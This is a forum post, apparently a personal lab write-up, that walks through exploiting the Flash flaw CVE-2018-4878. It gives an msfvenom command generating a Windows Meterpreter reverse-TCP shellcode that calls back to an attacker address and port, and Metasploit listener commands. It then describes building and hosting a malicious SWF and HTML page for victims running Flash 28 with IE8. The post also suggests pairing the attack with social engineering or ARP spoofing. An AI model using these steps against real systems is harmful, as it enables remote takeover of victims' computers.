完善资料让更多小伙伴认识你,还能领取20积分哦, 立即完善>
扫一扫,分享给好友
从公众号获取到一份“ATT&CK手册”,看到了这个漏洞CVE-2018-4878,但是一直没实操,今天刚好有点时间记录下,但是内容基本和网上的资料差不多,,,
利用场景:攻击者通过构造特殊的 Flash 链接,当用户用浏览器/邮件/Office 访问此 Flash 链接时,会被“远程代码执行”,并且直接被 getshell。一般来说可以配合社工,如果在内网环境可以配合arp欺骗一起利用,效果更佳。 |
|
相关推荐
1个回答
|
|
1、生成反弹脚本
msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.2.128 lport=4444 -f python>shellcode.txt 2、覆盖CVE-2018-4878.py payload部分。 2、msf监听反弹 msfconsole #启动msfuse exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset lhost 172.16.2.128set lport 4444run 3、CVE-2018-4878.py 生成exploit.swf、index2.html 只需要修改python代码中的绝对路径 生成文件,只需要运行python文件就好。 4、访问下载 把exploit.swf、index2.html放在任何目标可以访问到的地方即可。我这里是用的kali只带的apache服务。 5、受害者环境 Flash:AdobeFlashPlayer28.0.x(具体小版本没测过),安装即可。 浏览器:ie8或者使用ie8内核的浏览器。这里啰嗦一句户,我这win7系统标配就是ie9,可以在“安装更新”里面卸载ie9的更新。 6、访问攻击页面 说了可能不相信,我用ie8直接访问目标没反应,用这个12345浏览器居然可以,没整太明白。。。 访问就这个效果,其实核心代码“”就这句,那可以各种猥琐的玩,譬如你把这句放在shell的首页,,, 6、msf接收到反弹请求 到这里基本是结束了,msf大法可以自己多百度下。 |
|
|
|
你正在撰写答案
如果你是对答案或其他答案精选点评或询问,请使用“评论”功能。
“0元购”智元灵犀X1机器人,软硬件全套图纸和代码全公开!资料免费下载!
1114 浏览 1 评论
1009 浏览 0 评论
【实操文档】在智能硬件的大模型语音交互流程中接入RAG知识库
5846 浏览 1 评论
防止AI大模型被黑客病毒入侵控制(原创)聆思大模型AI开发套件评测4
997 浏览 0 评论
不可错过!人工神经网络算法、PID算法、Python人工智能学习等资料包分享(附源代码)
3290 浏览 0 评论
浏览过的版块 |
小黑屋| 手机版| Archiver| 电子发烧友 ( 湘ICP备2023018690号 )
GMT+8, 2024-11-24 21:16 , Processed in 0.576664 second(s), Total 73, Slave 56 queries .
Powered by 电子发烧友网
© 2015 bbs.elecfans.com
关注我们的微信
下载发烧友APP
电子发烧友观察
版权所有 © 湖南华秋数字科技有限公司
电子发烧友 (电路图) 湘公网安备 43011202000918 号 电信与信息服务业务经营许可证:合字B2-20210191 工商网监 湘ICP备2023018690号